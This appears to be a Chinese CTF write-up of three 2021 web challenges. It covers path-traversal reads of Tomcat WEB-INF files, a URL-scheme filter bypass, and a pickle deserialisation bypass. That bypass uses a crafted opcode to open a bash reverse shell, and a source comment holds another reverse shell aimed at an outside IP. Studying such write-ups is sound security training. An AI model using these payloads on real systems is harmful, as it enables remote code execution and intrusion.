长城杯ctf2021web复盘
java_url
任意文件读取
# java读取源码示例
../../../../../../../../../usr/local/tomcat/webapps/[xxxx]/WEB-INF/web.xml
../../../../../../../../../usr/local/tomcat/webapps/[xxxx]/WEB-INF/classes/cn/abc/servlet/UploadServlet.class
# 使用jd-gui-1.6.6.jar进行反编译
testURL.java
protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
String tartget_url = req.getParameter("url");
String pri = tartget_url.substring(0, tartget_url.indexOf(":"));
if (pri.matches("(?i)file|(?i)gopher|(?i)data")) {
resp.getWriter().write(String.valueOf((new StringBuilder()).append("false")));
} else {
resp.getWriter().write(String.valueOf(getContent(tartget_url)));
}
}
url可以绕过
/testURL?url=url:file:///flag
/testURL?url=%00file:///flag
ez_python
app.py
import pickle
import base64
from flask import Flask, request
from flask import render_template,redirect,send_from_directory
import os
import requests
import random
from flask import send_file
app = Flask(__name__)
class User():
def __init__(self,name,age):
self.name = name
self.age = age
def check(s):
if b'R' in s:
return 0
return 1
@app.route("/")
def index():
try:
user = base64.b64decode(request.cookies.get('user'))
if check(user):
user = pickle.loads(user)
username = user["username"]
else:
username = "bad,bad,hacker"
except:
username = "CTFer"
pic = '{0}.jpg'.format(random.randint(1,7))
try:
pic=request.args.get('pic')
with open(pic, 'rb') as f:
base64_data = base64.b64encode(f.read())
p = base64_data.decode()
except:
pic='{0}.jpg'.format(random.randint(1,7))
with open(pic, 'rb') as f:
base64_data = base64.b64encode(f.read())
p = base64_data.decode()
return render_template('index.html', uname=username, pic=p )
if __name__ == "__main__":
app.run('0.0.0.0',port=8888)# bash -i >& /dev/tcp/112.74.89.58/37051 0>&1
绕过R指令
import requests
import base64
url = "http://eci-2zea2edqz7xfw48r9zj2.cloudeci1.ichunqiu.com:8888/"
opcode=b'''(S'bash -c "bash -i >& /dev/tcp/127.0.0.1/9999 0>&1"'
ios
system
.'''
headers={"Cookie":"user={}".format(str(base64.b64encode(opcode),encoding='utf-8'))}
requests.get(url,headers=headers)
参考https://zhuanlan.zhihu.com/p/361349643
https://zhuanlan.zhihu.com/p/89132768
hd_pk
源码
from flask import Flask, request, session, render_template, url_for,redirect,render_template_string
import base64
import urllib.request
import random
from pickle import _loads
import uuid
SECRET_KEY=str(uuid.uuid4())
app = Flask(__name__)
app.config.update(dict(
SECRET_KEY=SECRET_KEY,
))
#apt install python3.8
@app.route('/')
@app.route('/index',methods=['GET'])
def index():
return render_template("index.html")
@app.route('/get_data', methods=["GET",'POST'])
def get_data():
data = request.form.get('data', base64.b64encode(b'S"test"\n.'))
if type(data) is str:
data=data.encode('utf8')
url = request.form.get('url', 'http://127.0.0.1:8888/test')
if data and url:
session['data'] = data
session['url'] = url
session["admin"]=False
return redirect(url_for('home'))
return redirect(url_for('/'))
@app.route('/home', methods=["GET"])
def home():
if session.get("admin",False):
return render_template_string(open(__file__).read())
else:
return render_template("home.html",data=session.get('data','Not find data...'))
@app.route('/getkey', methods=["GET"])
def getkey():
if request.method != "GET":
session["key"]=SECRET_KEY
return render_template_string('''@app.route('/getkey', methods=["GET"])
def getkey():
if request.method != "GET":
session["key"]=SECRET_KEY''')
@app.route('/get_hindd_result', methods=["GET"])
def get_hindd_result():
if session['data'] and session['url']:
if 'file:' in session['url']:
return "no no no"
data=_loads(base64.b64decode(session['data']))
url_text=urllib.request.urlopen(session['url']).read().decode('utf8')
if url_text in data or data in url_text:
return "you get it"
return 'what ???'
@app.route('/test', methods=["GET"])
def test():
return 'test'
if __name__ == '__main__':
app.run(host='0.0.0.0', debug=False, port=8888)
